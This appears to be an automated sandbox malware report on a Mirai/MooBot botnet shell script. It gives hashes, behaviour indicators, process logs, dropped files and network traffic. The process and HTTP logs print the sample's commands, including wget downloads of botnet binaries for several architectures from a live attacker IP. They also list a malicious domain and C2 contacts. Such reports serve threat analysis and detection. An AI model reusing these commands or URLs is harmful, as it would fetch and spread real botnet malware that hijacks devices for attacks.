File name: 16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a

Full analysis: https://app.any.run/tasks/c58e9c3f-c0ee-42eb-bbfc-5da258bceada
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: May 15, 2025, 22:20:47
OS: Ubuntu 22.04.2
Tags: mirai, botnet, moobot, auto
Indicators:
MIME: text/plain
File info: ASCII text
MD5: 1EB5800FDC704D55B97095A4E8705370
SHA1: 638CA37DFB8D1F88F60A4840A31BB988353D9B87
SHA256: 16E9F3E4EAA19F7DF9C7377B7F701F93DA82F3BDFA523C0645CC31D2FB41225A
SSDEEP: 6:/QEpNq+58IBOGVYtBLghWDx3F5kJVKE6LsVKE6NiVVNDV2uVf6vGujh:/Ql28gOGCugqg5sguThON

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • BOTNET has been found (auto)

      • wget (PID: 40672)
      • wget (PID: 40666)
      • wget (PID: 40681)
      • wget (PID: 40694)
      • wget (PID: 40729)
    • MIRAI has been found (auto)

      • wget (PID: 40753)
      • wget (PID: 40817)
      • wget (PID: 40851)
      • wget (PID: 41159)
      • wget (PID: 41165)
      • wget (PID: 41171)
    • Connects to the CnC server

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)
    • MIRAI has been detected (SURICATA)

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)
  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 40658)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 40663)
      • snapd-desktop-integration (PID: 41176)
    • Executes commands using command-line interpreter

      • sudo (PID: 40661)
    • Uses wget to download content

      • bash (PID: 40663)
    • Checks DMI information (probably VM detection)

      • pipewire (PID: 40755)
      • pulseaudio (PID: 40757)
      • gnome-shell (PID: 40859)
    • Reads passwd file

      • pipewire-media-session (PID: 40756)
      • dbus-daemon (PID: 40767)
      • gdm-session-worker (PID: 40701)
      • pipewire (PID: 40755)
      • dbus-daemon (PID: 40788)
      • gnome-shell (PID: 40859)
      • dbus-daemon (PID: 40892)
      • gvfs-udisks2-volume-monitor (PID: 40903)
      • whoopsie (PID: 40907)
      • gsd-print-notifications (PID: 40984)
      • gsd-media-keys (PID: 40997)
      • gsd-power (PID: 41016)
      • ibus-daemon (PID: 40962)
      • ibus-daemon (PID: 41110)
      • whoopsie (PID: 41141)
      • snapd-desktop-integration (PID: 41176)
      • gdm-session-worker (PID: 41262)
      • gdm-session-worker (PID: 41269)
    • Reads /proc/mounts (likely used to find writable filesystems)

      • dbus-daemon (PID: 40767)
      • dbus-daemon (PID: 40788)
      • dbus-daemon (PID: 40892)
      • gnome-shell (PID: 40859)
      • gjs-console (PID: 40953)
      • gjs-console (PID: 41099)
      • snapd-desktop-integration (PID: 41176)
    • Potential Corporate Privacy Violation

      • wget (PID: 40666)
      • wget (PID: 40672)
      • wget (PID: 40681)
      • wget (PID: 40694)
      • wget (PID: 40753)
      • wget (PID: 40817)
      • wget (PID: 40729)
      • wget (PID: 40746)
      • wget (PID: 40851)
      • wget (PID: 41171)
      • wget (PID: 41165)
      • wget (PID: 41159)
    • Contacting a server suspected of hosting an CnC

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)
    • Reads network configuration

      • bash (PID: 40663)
    • Gets active TCP connections

      • bash (PID: 40663)
    • Connects to unusual port

      • x86_64 (PID: 40686)
      • x86_64nk (deleted) (PID: 41156)
    • Check the Environment Variables Related to System Identification (os-release)

      • snapctl (PID: 41215)
      • snapctl (PID: 41220)
      • snapd-desktop-integration (PID: 41176)
  • INFO

    • Checks timezone

      • wget (PID: 40666)
      • wget (PID: 40672)
      • wget (PID: 40681)
      • wget (PID: 40694)
      • dbus-daemon (PID: 40767)
      • wget (PID: 40729)
      • gdm-session-worker (PID: 40701)
      • wget (PID: 40746)
      • wget (PID: 40753)
      • wget (PID: 40851)
      • whoopsie (PID: 40907)
      • gnome-shell (PID: 40859)
      • gnome-session-binary (PID: 40794)
      • wget (PID: 40817)
      • python3.10 (PID: 40844)
      • python3.10 (PID: 40845)
      • tracker-miner-fs-3 (PID: 40887)
      • gsd-color (PID: 40965)
      • spice-vdagent (PID: 41076)
      • python3.10 (PID: 40975)
      • gsd-print-notifications (PID: 40984)
      • whoopsie (PID: 41141)
      • wget (PID: 41159)
      • wget (PID: 41165)
      • wget (PID: 41171)
      • gdm-session-worker (PID: 41262)
    • Creates file in the temporary folder

      • gnome-shell (PID: 40859)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 473
Monitored processes: 253
Malicious processes: 18
Suspicious processes: 5

Behavior graph


Process information

PID: 40657
CMD: /bin/sh -c "sudo chown user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh && chmod +x /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh && DISPLAY=:0 sudo -iu user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh "
Path: /usr/bin/dash
Parent process: any-guest-agent
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40658
CMD: sudo chown user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 40659
CMD: chown user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 40660
CMD: chmod +x /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh
Path: /usr/bin/chmod
Parent process: dash
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40661
CMD: sudo -iu user /tmp/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 40662
CMD: systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service
Path: /usr/bin/systemctl
Parent process: snapd
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 40663
CMD: -bash --login -c \/tmp\/16e9f3e4eaa19f7df9c7377b7f701f93da82f3bdfa523c0645cc31d2fb41225a\.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40664
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40665
CMD: rm -rf mips
Path: /usr/bin/rm
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40666
CMD: wget http://196.251.71.152/poiuhjksdh/mips
Path: /usr/bin/wget
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Executable files: 0
Suspicious files: 97
Text files: 13
Unknown types: 0

Dropped files

PID | Process | Filename | Type
40666 | wget | /home/user/mips (deleted) | binary
40672 | wget | /home/user/mipsel (deleted) | binary
40681 | wget | /home/user/x86_64 (deleted) | binary
40694 | wget | /home/user/arm7 (deleted) | binary
40729 | wget | /home/user/arm6 (deleted) | binary
40746 | wget | /home/user/arm5 (deleted) | binary
40753 | wget | /home/user/mipsnk (deleted) | binary
40817 | wget | /home/user/mipselnk (deleted) | binary
40828 | session-migration | /var/lib/gdm3/.local/share/session_migration-(null) | text
40851 | wget | /home/user/x86_64nk (deleted) | binary
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 13
TCP/UDP connections: 24
DNS requests: 12
Threats: 43

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
 |  | GET | 204 | 91.189.91.96:80 | http://connectivity-check.ubuntu.com/ | unknown | whitelisted
40666 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/mips | unknown | unknown
40672 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/mipsel | unknown | unknown
40681 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/x86_64 | unknown | unknown
40694 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/arm7 | unknown | unknown
40729 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/arm6 | unknown | unknown
40746 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/arm5 | unknown | unknown
40753 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/mipsnk | unknown | unknown
40817 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/mipselnk | unknown | unknown
41171 | wget | GET | 200 | 196.251.71.152:80 | http://196.251.71.152/poiuhjksdh/arm5nk | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
484 | avahi-daemon | 224.0.0.251:5353 |  |  |  | unknown
 |  | 91.189.91.48:80 |  | Canonical Group Limited | US | unknown
 |  | 91.189.91.96:80 |  | Canonical Group Limited | US | unknown
 |  | 169.150.255.184:443 | odrs.gnome.org |  | GB | whitelisted
 |  | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
512 | snapd | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
40666 | wget | 196.251.71.152:80 |  |  | SC | unknown
40672 | wget | 196.251.71.152:80 |  |  | SC | unknown
40681 | wget | 196.251.71.152:80 |  |  | SC | unknown
40694 | wget | 196.251.71.152:80 |  |  | SC | unknown

DNS requests

Domain | IP | Reputation
odrs.gnome.org | 169.150.255.184, 207.211.211.27, 195.181.175.40, 212.102.56.178, 195.181.170.18, 169.150.255.181, 37.19.194.81 | whitelisted
1527653184.rsc.cdn77.org |  | unknown
google.com | 142.250.186.142, 2a00:1450:4001:828::200e | whitelisted
api.snapcraft.io | 185.125.188.54, 185.125.188.59, 185.125.188.57, 185.125.188.58, 2620:2d:4000:1010::344, 2620:2d:4000:1010::117, 2620:2d:4000:1010::42, 2620:2d:4000:1010::2e6 | whitelisted
fdh32fsdfhs.shop | 196.251.115.36 | malicious
8.100.168.192.in-addr.arpa |  | unknown
connectivity-check.ubuntu.com | 2620:2d:4000:1::96, 2620:2d:4000:1::2b, 2620:2d:4000:1::22, 2620:2d:4000:1::98, 2001:67c:1562::23, 2620:2d:4000:1::97, 2620:2d:4002:1::198, 2620:2d:4000:1::23, 2620:2d:4002:1::196, 2001:67c:1562::24, 2620:2d:4000:1::2a | whitelisted

Threats

PID | Process | Class | Message
40666 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40672 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40681 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40686 | x86_64 | Malware Command and Control Activity Detected | ET MALWARE ELF/MooBot Mirai DDoS Variant Server Response
40686 | x86_64 | Malware Command and Control Activity Detected | ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M2 (Group String Len 2+)
40686 | x86_64 | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 41
40686 | x86_64 | Malware Command and Control Activity Detected | ET MALWARE ELF/MooBot Mirai DDoS Variant Server Response
40694 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40729 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40746 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info